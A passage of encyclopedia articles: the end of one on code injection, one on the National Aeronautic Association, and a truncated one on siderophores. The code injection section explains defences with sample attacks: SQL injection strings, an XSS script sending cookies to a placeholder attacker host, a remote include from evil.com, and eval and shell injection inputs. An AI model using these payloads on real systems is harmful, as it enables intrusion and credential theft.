type system. Validating or "sanitizing" input, such as whitelisting known good values. This can be done on the client side, which is prone to modification by malicious users, or on the server side, which is more secure. Encoding input or escaping dangerous characters. For instance, in PHP, using the htmlspecialchars() function to escape special characters for safe output of text in HTML and the mysqli::real_escape_string() function to isolate data which will be included in an SQL request can protect against SQL injection. Encoding output, which can be used to prevent XSS attacks against website visitors. Using the HttpOnly flag for HTTP cookies. When this flag is set, it does not allow client-side script interaction with cookies, thereby preventing certain XSS attacks. Modular shell disassociation from the kernel. Regarding SQL injection, one can use parameterized queries, stored procedures, whitelist input validation, and other approaches to help mitigate the risk of an attack. Using object-relational mapping can further help prevent users from directly manipulating SQL queries. The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injections of user code on a user-operated machine, which often results in privilege elevation attacks. Some approaches that are used to detect and isolate managed and unmanaged code injections are: Runtime image hash validation, which involves capturing the hash of a partial or complete image of the executable loaded into memory and comparing it with stored and expected hashes. NX bit: all user data is stored in special memory sections that are marked as non-executable. The processor is made aware that no code exists in that part of memory and refuses to execute anything found in there. Use canaries, which are randomly placed values in a stack. At runtime, a canary is checked when a function returns. If a canary has been modified, the program stops execution and exits. This occurs on a failed Stack Overflow Attack. Code Pointer Masking (CPM): after loading a (potentially changed) code pointer into a register, the user can apply a bitmask to the pointer. This effectively restricts the addresses to which the pointer can refer. This is used in the C programming language. Examples SQL injection An SQL injection takes advantage of SQL syntax to inject malicious commands that can read or modify a database or compromise the meaning of the original query. For example, consider a web page that has two text fields which allow users to enter a username and a password. The code behind the page will generate an SQL query to check the password against the list of user names: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code "('Password' OR '1'='1') in the Password field, then the resulting query will look like this: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' OR '1'='1' In the example above, "Password" is assumed to be blank or some innocuous string. "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run or even to load up and run external programs. Assume a query with the following format:SELECT User.UserID FROM User WHERE User.UserID = ' " + UserID + " ' AND User.Pwd = ' " + Password + " 'If an adversary has the following for inputs: UserID: ';DROP TABLE User; --' Password: 'OR"=' then the query will be parsed as:SELECT User.UserID FROM User WHERE User.UserID = '';DROP TABLE User; --'AND Pwd = ''OR"=' The resulting User table will be removed from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one. -- signifies the start of a comment. Cross-site scripting Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users and typically receives messages such as: Very nice site! However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message such as: Nice site, I think I'll take it. <script>window.location="https://some_attacker/evilcgi/cookie.cgi?steal=" + escape(document.cookie)</script> If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code. HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions of what input data is possible or the effects of special data. Server Side Template Injection Template engines are often used in modern web applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities such as server-side Side Template Injections. While this vulnerability is similar to cross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. The example below shows the concept. Here the template {{visitor_name}} is replaced with data during the rendering process.Hello {{visitor_name}}An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor_name. Depending on the implementation of the web application, he could choose to inject {{7*'7'}} which the renderer could resolve to Hello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable to remote code execution. Dynamic evaluation vulnerabilities An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. $myvar = 'somevalue'; $x = $_GET['arg']; eval('$myvar = ' . $x . ';'); The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo". Object injection PHP allows serialization and deserialization of whole objects. If an untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks. Such an attack on Joomla was found in 2013. Remote file injection Consider this PHP program (which includes a file specified by request): <?php $color = 'blue'; if (isset($_GET['color'])) $color = $_GET['color']; require($color . '.php'); The example expects a color to be provided, while attackers might provide COLOR=http://evil.com/exploit causing PHP to load the remote file. Format specifier injection Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following short C program that has a local variable char array password which holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. char user_input[100]; int int_in; char password[10] = "Password1"; printf("Enter an integer\n"); scanf("%d", &int_in); printf("Please enter a string\n"); fgets(user_input, sizeof(user_input), stdin); printf(user_input); // Safe version is: printf("%s", user_input); printf("\n"); return 0;If the user input is filled with a list of format specifiers, such as %s%s%s%s%s%s%s%s, then printf()will start reading from the stack. Eventually, one of the %s format specifiers will access the address of password, which is on the stack, and print Password1 to the screen. Shell injection Shell injection (or command injection) is named after UNIX shells but applies to most systems that allow software to programmatically execute a command line. Here is an example vulnerable tcsh script: # !/bin/tcsh # check arg outputs it matches if arg is one if ($1 == 1) echo it matches If the above is stored in the executable file ./check, the shell command ./check " 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack. Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start(). Client-server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program called funnytext to replace a word the user sent with some other word. <?php passthru("/bin/funnytext " . $_GET['USER_INPUT']); The passthru function in the above program composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features (this list is not exhaustive): Some languages offer functions to properly escape or quote strings that are used to construct shell commands: PHP: escapeshellarg() and escapeshellcmd() Python: shlex.quote() However, this still puts the burden on programmers to know/learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly rather than through a shell, thus preventing the possibility of shell injection. However, these APIs tend to not support various convenience features of shells and/or to be more cumbersome/verbose compared to concise shell syntax. See also References External links Tadeusz Pietraszek and Chris Vanden Berghe. "Defending against Injection Attacks through Context-Sensitive String Evaluation (CSSE)" News article "Flux spreads wider—First Trojan horse to make use of code injection to prevent detection from a firewall The Daily WTF regularly reports real-world instances of susceptibility to code injection in software Types of malware Injection exploits Machine code Articles with example C code
Code injection
[ "Technology" ]
3,504
[ "Computer security exploits", "Injection exploits" ]
1,065,474
https://en.wikipedia.org/wiki/National%20Aeronautic%20Association
The National Aeronautic Association (NAA) is a federally recognized 501c3 whose mission is to advance and oversee the advancement of the art, sport, and science of aviation and space flight. The NAA achieves this by fostering opportunities to participate fully in aviation activities and promoting public understanding of the importance of aviation and space flight in the United States. History In the early years of the 20th century, aviation was fascinating. Untouchable to most, the people who could engage in the pursuit were the wealthiest Americans of that time, like the Vanderbilt's, Glidden's, and Dodges, many of whom belonged to the Automobile Club of America. This group first chose to branch out into the fledgling aviation field in 1905, founding the Aero Club of America (ACA). The ACA’s first goal was to promote aviation in any way possible as both a sport and a commercial endeavor. From its founding until 1922, the ACA grew in vision and scope and counted many successes in building aviation, including issuing all pilot licenses. In that year, a change was needed to accommodate the expanding business of the ACA, and the National Aeronautic Association (NAA) was incorporated as the Aero Club’s successor. The NAA continued the original group’s mission, including issuing all pilot's licenses until the Civil Aeronautics Act of 1926. While the Aero Club of America was based in New York City, the NAA is based in the nation's capital, Washington, D.C., where it continues to serve the same mission set forth by the best of the best in aeronautics. The NAA and the Fédération Aéronautique Internationale In 1905, the NAA joined Germany, Spain, Belgium, the United Kingdom, Italy, Switzerland, and France to create an international aviation organizationFédération Aéronautique Internationalewith the goal of fostering aeronautical activities worldwide. FAI is the organization responsible for establishing the rules for record-setting and competition, and also for recognizing international achievements in aeronautics and astronautics. The NAA is the largest member of FAI and is responsible for appointing representatives to 15 major air sport and technical committees of FAI. The NAA also represents U.S. interests in aviation at the FAI’s Annual General Conference. Mission The NAA's mission is to advance and oversee the advancement of the art, sport, and science of aviation and space flight. The NAA achieves this by fostering opportunities to participate fully in aviation activities and promoting public understanding of the importance of aviation and space flight in the United States. The NAA's Purpose is to Drive excellence with recognition, including through contests, awards, and trophies. Sanction and bestow authority to Americans representing the best in International Air Sports. Promote and foster appreciation for the art of flying and strengthen the aerospace business. Encourage the study, establishment, and deeper understanding of the science of aeronautics in all forms to encourage inventions and improvements in the field and across the industry. Assist in ensuring a sustainable and reliable aviation system. Aviation and aerospace records The NAA has certified aviation and aerospace records in the United States since 1905. Its records database counts over 8,000 record flights including those of balloons, airships, airplanes (land planes, seaplanes, amphibians, and very light jets) gliders, helicopters, autogiros, model aircraft, parachutes, human-powered aircraft, spacecraft, tilt-wing/tilt-engine aircraft, hang gliders, paragliders, microlights, space models, and UAVs. In addition, the NAA certifies various records, including altitude, time-to-climb, distance, speed, greatest payload carried, and efficiency. As the U.S. representative to FAI, the NAA is the sole authority for overseeing and certifying all aviation records in the United States. On average, the NAA certifies 150 records each year. The NAA records process is directed by the NAA Contest and Records Board and managed by the Arthur W. Greenfield, Senior V.P., Contest and Records. Contest and record board members Members Rodney M. Skaar, Chair Kristan R. Maynard, Vice-Chair A.W. Greenfield, Secretary Scott A. Neumann Brian G. Utley Ardyth M. Williams Advisory Panel Justin L. Druckemiller David B. Higginbotham Larry E. Steenstry Aviation trophies and awards The NAA acknowledges the accomplishments and achievements in aviation and aerospace through its trophies and awards. Open nomination awards Frank G. Brewer Trophy Nomination period: May 1 – August 31 The Frank G. Brewer Trophy is awarded annually to an individual, a group of individuals, or an organization for significant contributions of enduring value to aerospace education in the United States. Robert J. Collier Trophy Nomination period: December 1 – January 31 The Robert J Collier Trophy is awarded annually for the greatest achievement in aeronautics or astronautics in America, with respect to improving the performance, efficiency, or safety of air or space vehicles, the value of which has been thoroughly demonstrated by actual use during the preceding year. Clifford B. Harmon Aeronaut Trophy Nomination period: April 15 – July 15 The Harmon Aeronaut Trophy is awarded for the most outstanding international achievement in the art and/or science of aeronautics (ballooning) for the calendar period of July 1 – June 30 of the previous year. Katharine Wright Memorial Trophy Nomination period: January 1 – March 31 The Katharine Wright Memorial Trophy is awarded to a woman who has contributed to the success of others or made a personal contribution to the advancement of the art, sport, and science of aviation and space flight over an extended period. Wesley L. McDonald Distinguished Statesman & Stateswoman of Aviation Awards Nomination period: May 1 – August 31 The Wesley L. McDonald Distinguished Statesman and Stateswoman of Aviation Awards are awarded to outstanding Americans who, by their efforts over an extended period of years, have made contributions of significant value to aeronautics, and have reflected credit upon America and themselves. Public Benefit Flying Awards Nomination period: May 1 – August 31 The Public Benefit Flying Awards honors volunteer pilots, other volunteers, and their organizations engaged in flying to help others. Katherine & Marjorie Stinson Trophy Nomination period: September 1 – November 30 The Katherine & Marjorie Stinson Trophy recognizes a living person, male or female, for an outstanding and enduring contribution to the role of women in the field of aviation, aeronautics, space, or related sciences. Wright Brothers Memorial Trophy Nomination period: April 1 – June 1 The Wright Brothers Memorial Trophy  is awarded to a living American for significant public service of enduring value to aviation in the United States. Special nomination awards Clifford W. Henderson Trophy The Clifford W. Henderson Trophy is given annually to a living individual or group whose vision, leadership, or skill has made a significant and lasting contribution to the promotion and advancement of aviation or space activity. A nomination will be put forth annually by the President of the NAA, and a vote of the Executive Committee will confirm the recipient. Clarence Mackay Trophy The Clarence Mackay Trophy is awarded for the “most meritorious flight of the year” by an Air Force person, persons, or organization. The Trophy is administered by the United States Air Force and the NAA and is presented in conjunction with the Chief of Staff of the Air Force. Bruce Whitman Trophy The Bruce Whitman Trophy is awarded annually to outstanding individuals who have made significant contributions to aviation or aerospace in the United States and who, by working with museums and other institutions, have promoted an appreciation by students and the broader public of the sacrifices and legacy of members of the military service. A nomination will be put forth annually by the Chair of the NAA, and a vote of the Executive Committee will confirm the recipient. FAI awards Within the United States and its Territories, the NAA has the sole responsibility of administering awards established by the FAI. Gold Air Medal: Awarded to individuals who have contributed greatly to the development of aeronautics by their activities, work, achievements, initiative or devotion to the cause of aviation. Gold Space Medal: Awarded to individuals who have contributed greatly to the development of Astronautics by their activities, work, achievements, initiative or devotion to the cause of space. Sabiha Gökçen Medal: Awarded to a woman who performs the most outstanding achievement in any air sport in the previous year. Silver Medal: Awarded to an individual who has occupied high office in FAI or in an aeronautical organization in one of its member countries, and in the discharge of their duties have shown exceptional powers of leadership and influence, to the benefit of the whole international air sport community. Diploma for Outstanding Airmanship: Awarded to a person or a group of persons for a feat of outstanding airmanship in sub-orbital flight during one of the previous two years and which resulted in the saving of life of others and was carried out with that objective. Anyone engaged in a routine search and/or rescue mission shall not be eligible. Paul Tissandier Diploma. Awarded to those who have served the cause of Aviation in general and Sporting Aviation in particular, by their work, initiative, devotion or in other ways. Honorary Group Diploma: Awarded to groups of people (design offices, scientific bodies, aeronautical publications, etc.) that have contributed significantly to the progress of Aeronautics and Astronautics during the previous year or years. International Aviation Art Contest: Held annually to encourage young people worldwide to demonstrate the importance of aviation through art and to motivate them to become more familiar with and participate in aeronautics, engineering and science. The United States portion of the contest is sponsored by the National Aeronautic Association (NAA) in partnership with the National Association of State Aviation Officials (NASAO) and supported by Embry-Riddle Aeronautical University (ERAU), National Coalition for Aviation Education (NCAE) and the Federal Aviation Administration (FAA). Air sports In America Air Sport Organizations (ASO) are integral to the NAA’s ability to fulfill its mission. Many ASOs serve as the introduction or gateway to commercial and business aviation. They are also competitive disciplines to many Americans and lifelong hobbies to thousands more. To foster our relationship with ASOs, the NAA works closely with ASOs to encourage membership and help drive innovation. America’s ASOs constantly change and evolve as new technology and aircraft become available. The many disciplines of flying are represented by a variety of Air Sport Organizations (ASOs), which are the heart and soul of aviation in America. Nearly half a million people belong to ASOs in the United States, representing aerobatics, aeromodelling, ballooning, gliding, hang gliding and paragliding, powered paragliding and paramotor, and parachuting. America's air sport organizations Part of NAA’s mission is to encourage the sport of aviation, and it does so through its relationship with several United States Air Sports Organizations (ASOs). The NAA founded or helped form many ASOs and continues working closely with them all. ASOs are constantly changing as technology and aircraft evolve and as new air sports become available. Aerobatics: International Aerobatic Club Aeromodelling: Academy of Model Aeronautics Ballooning and airships: Balloon Federation of American Gliding: Soaring Society of America Hang gliding and paragliding: United States Hang Gliding and Paragliding Association Parachuting: United States Parachute Association Indoor skydiving Powered paragliding and paramotor flying: United States Powered Paragliding Association NAA leadership The Board of Directors has an intentional blend of representation from throughout the aviation industry. The NAA Board includes government officials, industry leaders, executives of air sport organizations, and representatives of prominent organizations. The NAA Board provides strategic leadership to the NAA’s President and holds responsibility for the content and alteration of the NAA’s By-Laws. Officers Jim Albaugh, Chair Samantha Magill, Vice Chair, NASA Jason Hopkins, Treasurer, Lockheed Martin Elizabeth Matarese, Secretary, FAA (Retired) Ted Ellett, General Counsel, Hogan Lovells Amy Spowart, NAA President and CEO Board of Directors Nicole Alexander, Aero Club of Wichita Jeremy Bayer, The Boeing Company Darby Becker, Aero Club of Washington Joshua Boehm, Spirit AeroSystems Ché Bolden, The Charles F. Bolden Group Pete Bunce, General Aviation Manufacturers Association Matt Byrd, Hillwood Aviation Leda Chong, Gulfstream Aerospace Corporation J. Ray Davis, Rolls-Royce, North America Arthur W. Greenfield, Jr., NAA Contest & Records Director Sierra Grimes, aviation professional Rich Hanson, Academy of Model Aeronautics Lauren Haertlein, Joby Aviation Chris Hart, Hart Solutions, LLC Joan Higginbotham, Joan Higginbotham Ad Astra, LLC Joseph Huber, Cincinnati/Northern Kentucky Int’l Airport Dick Koenig, New England Air Museum Ben Kowalski, Cirrus Aircraft John S. Langford, Electra.aero Denise Layton, Soaring Society of America Rebecca Lutte, Embry-Riddle Aeronautical University Brad McKeage, Embraer Mary Miller, Signature Aviation Mary Claire Murphy, Textron Aviation Billy Nolen, Archer Aviation Mark Ofsthun, Honda Aircraft Company Martiqua Post, U.S. Air Force Academy Pat Prentiss, The Ninety-Nines, Inc. Skip Ringo, The Ringo Group Yvette Rose, FAA Stacey Rudser, Association for Women in Aviation Maintenance Sami Said, Northrop Grumman Bob Stangarone, Stangarone & Associates Liana Sucar-Hamel, Airbus Americas Brad Thress, FlightSafety International Anthony L. Velocci, Aviation Week & Space Technology Magazine (Retired) James Viola, Helicopter Association International Patty Wagstaff, Patty Wagstaff Aviation Safety, LLC Clyde Woltman, Leonardo Helicopters, U.S.A. Claudia Zapata-Cardone, United Airlines NAA membership The NAA is honored to oversee the advancement of the art, sport, and science of aviation and space flight. Its mission is achieved by fostering opportunities to participate fully in aviation activities and promoting public understanding of the importance of aviation and space flight to the United States. Corporate Members The support of the NAA’s Corporate Members is the cornerstone in achieving its mission of advancing the art, sport, and science of aviation and space flight. * Airbus Aviation Partners, Inc. Bombardier Aerospace Boom Supersonic The Boeing Company Cincinnati/Northern Kentucky International Airport Cirrus Aircraft Electra.aero Embraer FlightSafety International Gulfstream Aerospace Honda Aircraft Company Leonardo Helicopters, U.S.A. Lockheed Martin Corporation MedAire Northrop Grumman Corporation Rolls-Royce North America Signature Flight Support Spirit AeroSystems Textron Aviation Air sport members Part of NAA’s mission is to encourage the sport of aviation, and it does so through its relationship with several United States air sports organizations (ASOs). Academy of Model Aeronautics Balloon Federation of America International Aerobatic Club Soaring Society of America United States Hang Gliding and Paragliding Association United States Parachute Association United States Ultralight Association United States Powered Paragliding Association Affiliate Members NAA’s Affiliate Members represent a unique collection of aviation businesses and organizations participating in critical aviation issues, such as aircraft manufacturers’ liability, airline operations, historic preservation, etc. Affiliating with NAA helps the aviation community by providing a shared forum for many organizations and associations. Aerospace Industries Association Air Line Pilots Association Air Traffic Control Association Aircraft Owners and Pilots Association Airlines for America Airports Council International – North America American Institute of Aeronautics and Astronautics Cargo Airline Association Experimental Aircraft Association General Aviation Manufacturers Association National Air Traffic Controllers Association National Association of State Aviation Officials National Business Aviation Association Radio Technical Commission for Aeronautics Vertical Aviation International Institutional Members NAA's Institutional Members represent institutions such as colleges, universities, museums, and other places of learning. As spaces for learning, development, and research, institutional members support NAA’s mission to promote the importance of aviation to the general public and support the future advancement of aeronautics. Cosmosphere Kansas Aviation Museum National Aviation Hall of Fame Aero Club members As Americas Aero Club, the NAA serves as a unifier for all regional/local aero clubs. Aero Club Members differ from region to region, but almost all consist of aviation professionals and enthusiasts. Each Club has a distinct and distinguished history; activities and interests vary, but all support aviation in their communities. Aero Club of Metropolitan Atlanta Aero Club of New England Aero Club of Northern California Aero Club of Southern California Aero Club of Washington Wichita Aeroclub References External links National Aeronautic Association Aviation organizations based in the United States Aeronautics Aviation competitions and awards Fédération Aéronautique Internationale
National Aeronautic Association
[ "Engineering" ]
3,372
[ "Fédération Aéronautique Internationale", "Aeronautics organizations" ]
1,065,475
https://en.wikipedia.org/wiki/Siderophore
Siderophores (Greek: "iron carrier") are small, high-affinity iron-chelating compounds that are secreted by microorganisms such as bacteria and fungi. They help the organism accumulate iron. Although a widening range of siderophore functions is now being appreciated, siderophores are among the strongest (highest affinity) Fe3+ binding agents known. Phytosiderophores are siderophores produced by plants. Scarcity of soluble iron Despite being one of the most abundant elements in the Earth's crust, iron is not readily bioavailable. In most aerobic environments, such as the soil or sea, iron exists in the ferric (Fe3+) state, which tends to form insoluble rust-like solids. To be effective, nutrients must not only be available, they must be soluble. Microbes release siderophores to scavenge iron from these mineral phases by formation of soluble Fe3+ complexes that can be taken up by active transport mechanisms. Many siderophores are nonribosomal peptides, although several are biosynthesised independently. Siderophores are also important for some pathogenic bacteria for their acquisition of iron. In mammalian hosts, iron is tightly bound to proteins such as hemoglobin, transferrin, lactoferrin and ferritin. The strict homeostasis of iron leads to a free concentration of about 10−24 mol L−1, hence there are great evolutionary pressures put on pathogenic bacteria to obtain this metal. For example, the anthrax pathogen Bacillus anthracis releases two siderophores, bacillibactin and petrobactin, to scavenge ferric ion from iron containing proteins. While bacillibactin has been shown to bind to the immune system protein siderocalin, petrobactin is assumed to evade the immune system and has been shown to be important for virulence in mice. Siderophores are amongst the strongest binders to Fe3+ known, with enterobactin being one of the strongest of these. Because of this property, they have attracted interest from medical science in metal chelation therapy, with the siderophore desferrioxamine B gaining widespread use in treatments for iron poisoning and thalassemia. Besides siderophores, some pathogenic bacteria produce hemophores (heme binding scavenging proteins) or have receptors that bind directly to iron/heme proteins. In eukaryotes, other strategies to enhance iron solubility and uptake are the acidification of the surroundings (e.g. used by plant roots) or the extracellular reduction of Fe3+ into the more soluble Fe2+ ions. Structure Siderophores usually form a stable, hexadentate, octahedral complex preferentially with Fe3+ compared to other naturally occurring abundant metal ions, although if there are fewer than six donor atoms water can also coordinate. The most effective siderophores are those that have three bidentate ligands per molecule, forming a hexadentate complex and causing a smaller entropic change than that caused by chelating a single ferric ion with separate ligands. Fe3+ is a strong Lewis acid, preferring strong Lewis bases such as anionic or neutral oxygen atoms to coordinate with. Microbes usually release the iron from the siderophore by reduction to Fe2+ which has little affinity to these ligands. Siderophores are usually classified by the ligands used to chelate the ferric iron. The major groups of siderophores include the catecholates (phenolates), hydroxamates and carboxylates (e.g. derivatives of citric acid). Citric acid can also act as a siderophore. The wide variety of siderophores may be due to evolutionary pressures placed on microbes to produce structurally different siderophores which cannot be transported by other microbes' specific active transport systems, or in the case of pathogens deactivated by the host organism. Diversity Examples of siderophores produced by various bacteria and fungi: Hydroxamate siderophores Catecholate siderophores Mixed ligands Amino carboxylate ligands A comprehensive list of siderophore structures (over 250) is presented in Appendix 1 in reference. Biological function Bacteria and fungi In response to iron limitation in their environment, genes involved in microbe siderophore production and uptake are derepressed, leading to manufacture of siderophores and the appropriate uptake proteins. In bacteria, Fe2+-dependent repressors bind to DNA upstream to genes involved in siderophore production at high intracellular iron concentrations. At low concentrations, Fe2+ dissociates from the repressor, which in turn dissociates from the DNA, leading to transcription of the genes. In gram-negative and AT-rich gram-positive bacteria, this is usually regulated by the Fur (ferric uptake regulator) repressor, whilst in GC-rich gram-positive bacteria (e.g. Actinomycetota) it is DtxR (diphtheria toxin repressor), so-called as the production of the dangerous diphtheria toxin by Corynebacterium diphtheriae is also regulated by this system. This is followed by excretion of the siderophore into the extracellular environment, where the siderophore acts to sequester and solubilize the iron. Siderophores are then recognized by cell specific receptors on the outer membrane of the cell. In fungi and other eukaryotes, the Fe-siderophore complex may be extracellularly reduced to Fe2+, while in many cases the whole Fe-siderophore complex is actively transported across the cell membrane. In gram-negative bacteria, these are transported into the periplasm via TonB-dependent receptors, and are transferred into the cytoplasm by ABC transporters. Once in the cytoplasm of the cell, the Fe3+-siderophore complex is usually reduced to Fe2+ to release the iron, especially in the case of "weaker" siderophore ligands such as hydroxamates and carboxylates. Siderophore decomposition or other biological mechanisms can also release iron, especially in the case of catecholates such as ferric-enterobactin, whose reduction potential is too low for reducing agents such as flavin adenine dinucleotide, hence enzymatic degradation is needed to release the iron. Plants Although there is sufficient iron in most soils for plant growth, plant iron deficiency is a problem in calcareous soil, due to the low solubility of iron(III) hydroxide. Calcareous soil accounts for 30% of the world's farmland. Under such conditions graminaceous plants (grasses, cereals and rice) secrete phytosiderophores into the soil, a typical example being deoxymugineic acid. Phytosiderophores have a different structure to those of fungal and bacterial siderophores having two α-aminocarboxylate binding centres, together with a single α-hydroxycarboxylate unit. This latter bidentate function provides phytosiderophores with a high selectivity for iron(III). When grown in an iron -deficient soil, roots of graminaceous plants secrete siderophores into the rhizosphere. On scavenging iron(III) the iron–phytosiderophore complex is transported across the cytoplasmic membrane using a proton symport mechanism. The iron(III) complex is then reduced to iron(II) and the iron is transferred to nicotianamine, which although very similar to the phytosiderophores is selective for iron(II) and is not secreted by the roots. Nicotianamine translocates iron in phloem to all plant parts. Chelating in Pseudomonas aeruginosa Iron is an important nutrient for the bacterium Pseudomonas aeruginosa, however, iron is not easily accessible in the environment. To overcome this problem, P. aeruginosa produces siderophores to bind and transport iron. But the bacterium that produced the siderophores does not necessarily receive the direct benefit of iron intake. Rather all members of the cellular population are equally likely to access the iron-siderophore complexes. The production of siderophores also requires the bacterium to expend energy. Thus, siderophore production can be looked at as an altruistic trait because it is beneficial for the local group but costly for the individual. This altruistic dynamic requires every member of the cellular population to equally contribute to siderophore production. But at times mutations can occur that result in some bacteria producing lower amounts of siderophore. These mutations give an evolutionary advantage because the bacterium can benefit from siderophore production without suffering the energy cost. Thus, more energy can be allocated to growth. Members of the cellular population that can efficiently produce these siderophores are commonly referred to as cooperators; members that produce little to no siderophores are often referred to as cheaters. Research has shown when cooperators and cheaters are grown together, cooperators have a decrease in fitness while cheaters have an increase in fitness. It is observed that the magnitude of change in fitness increases with increasing iron-limitation. With an increase in fitness, the cheaters can outcompete the cooperators; this leads to an overall decrease in fitness of the group, due to lack of sufficient siderophore production. Pyoverdine and siderophore production in Pseudomonas aeruginosa In a recent study, the production of pyoverdine (PVD), a type of siderophore, in the bacterium Pseudomonas aeruginosa has been explored. This study focused on the construction, modeling, and dynamic simulation of PVD biosynthesis, a virulence factor, through a systemic approach. This approach considers that the metabolic pathway of PVD synthesis is regulated by the phenomenon of quorum-sensing (QS), a cellular communication system that allows bacteria to coordinate their behavior based on their population density. The study showed that as bacterial growth increases, so does the extracellular concentration of QS signaling molecules, thus emulating the natural behavior of P. aeruginosa PAO1. To carry out this study, a metabolic network model of P. aeruginosa was built based on the iMO1056 model, the genomic annotation of the P. aeruginosa PAO1 strain, and the metabolic pathway of PVD synthesis. This model included the synthesis of PVD, transport reactions, exchange, and QS signaling molecules. The resulting model, called CCBM1146, showed that the QS phenomenon directly influences the metabolism of P. aeruginosa towards the biosynthesis of PVD as a function of the change in QS signal intensity. This work is the first in silico report of an integrative model that comprises the QS gene regulatory network and the metabolic network of P. aeruginosa, providing a detailed view of how the production of pyoverdine and siderophores in Pseudomonas aeruginosa are influenced by the quorum-sensing phenomenon Furthermore, intratumor P. aeruginosa may scavenge iron by producing pyoverdine, which indirectly protect tumor cells from ferroptosis ('iron death'), emphasizing the need for ferroptosis inducers (thiostrepton) for cancer treatment. Ecology Siderophores become important in the ecological niche defined by low iron availability, iron being one of the critical growth limiting factors for virtually all aerobic microorganisms. There are four major ecological habitats: soil and surface water, marine water, plant tissue (pathogens) and animal tissue (pathogens). Soil and surface water The soil is a rich source of bacterial and fungal genera. Common Gram-positive species are those belonging to the Actinomycetales and species of the genera Bacillus, Arthrobacter and Nocardia. Many of these organisms produce and secrete ferrioxamines which lead to growth promotion of not only the producing organisms, but also other microbial populations that are able to utilize exogenous siderophores. Soil fungi include Aspergillus and Penicillium predominantly produce ferrichromes. This group of siderophores consist of cyclic hexapeptides and consequently are highly resistant to environmental degradation associated with the wide range of hydrolytic enzymes that are present in humic soil. Soils containing decaying plant material possess pH values as low as 3–4. Under such conditions organisms that produce hydroxamate siderophores have an advantage due to the extreme acid stability of these molecules. The microbial population of fresh water is similar to that of soil, indeed many bacteria are washed out from the soil. In addition, fresh-water lakes contain large populations of Pseudomonas, Azomonas, Aeromonas and Alcaligenes species. As siderophores are secreted into the surroundings, siderophores can be detected by bacterivorous predators, including Caenorhabditis elegans, resulting in the nematode migration to the bacterial prey. Marine water In contrast to most fresh-water sources, iron levels in surface sea-water are extremely low (1 nM to 1 μM in the upper 200 m) and much lower than those of V, Cr, Co, Ni, Cu and Zn. Virtually all this iron is in the iron(III) state and complexed to organic ligands. These low levels of iron limit the primary production of phytoplankton and have led to the Iron Hypothesis where it was proposed that an influx of iron would promote phytoplankton growth and thereby reduce atmospheric CO2. This hypothesis has been tested on more than 10 different occasions and in all cases, massive blooms resulted. However, the blooms persisted for variable periods of time. An interesting observation made in some of these studies was that the concentration of the organic ligands increased over a short time span in order to match the concentration of added iron, thus implying biological origin and in view of their affinity for iron possibly being of a siderophore or siderophore-like nature. Significantly, heterotrophic bacteria were also found to markedly increase in number in the iron-induced blooms. Thus there is the element of synergism between phytoplankton and heterotrophic bacteria. Phytoplankton require iron (provided by bacterial siderophores), and heterotrophic bacteria require non-CO2 carbon sources (provided by phytoplankton). The dilute nature of the pelagic marine environment promotes large diffusive losses and renders the efficiency of the normal siderophore-based iron uptake strategies problematic. However, many heterotrophic marine bacteria do produce siderophores, albeit with properties different from those produced by terrestrial organisms. Many marine siderophores are surface-active and tend to form molecular aggregates, for example aquachelins. The presence of the fatty acyl chain renders the molecules with a high surface activity and an ability to form micelles. Thus, when secreted, these molecules bind to surfaces and to each other, thereby slowing the rate of diffusion away from the secreting organism and maintaining a relatively high local siderophore concentration. Phytoplankton have high iron requirements and yet the majority (and possibly all) do not produce siderophores. Phytoplankton can, however, obtain iron from siderophore complexes by the aid of membrane-bound reductases and certainly from iron(II) generated via photochemical decomposition of iron(III) siderophores. Thus a large proportion of iron (possibly all iron) absorbed by phytoplankton is dependent on bacterial siderophore production. Plant pathogens Most plant pathogens invade the apoplasm by releasing pectolytic enzymes which facilitate the spread of the invading organism. Bacteria frequently infect plants by gaining entry to the tissue via the stomata. Having entered the plant they spread and multiply in the intercellular spaces. With bacterial vascular diseases, the infection is spread within the plants through the xylem. Once within the plant, the bacteria need to be able to scavenge iron from the two main iron-transporting ligands, nicotianamine and citrate. To do this they produce siderophores, thus the enterobacterial Erwinia chrysanthemi produces two siderophores, chrysobactin and 